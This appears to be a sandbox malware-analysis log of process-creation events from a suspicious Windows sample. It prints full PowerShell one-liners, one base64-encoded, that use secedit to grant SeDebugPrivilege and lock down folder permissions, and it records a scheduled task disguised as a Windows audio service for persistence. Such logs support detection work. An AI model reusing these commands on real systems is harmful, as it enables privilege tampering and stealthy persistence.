                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\ProgramData\Program\iusb3mon.exe C:\ProgramData\program\iusb3mon.exe
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
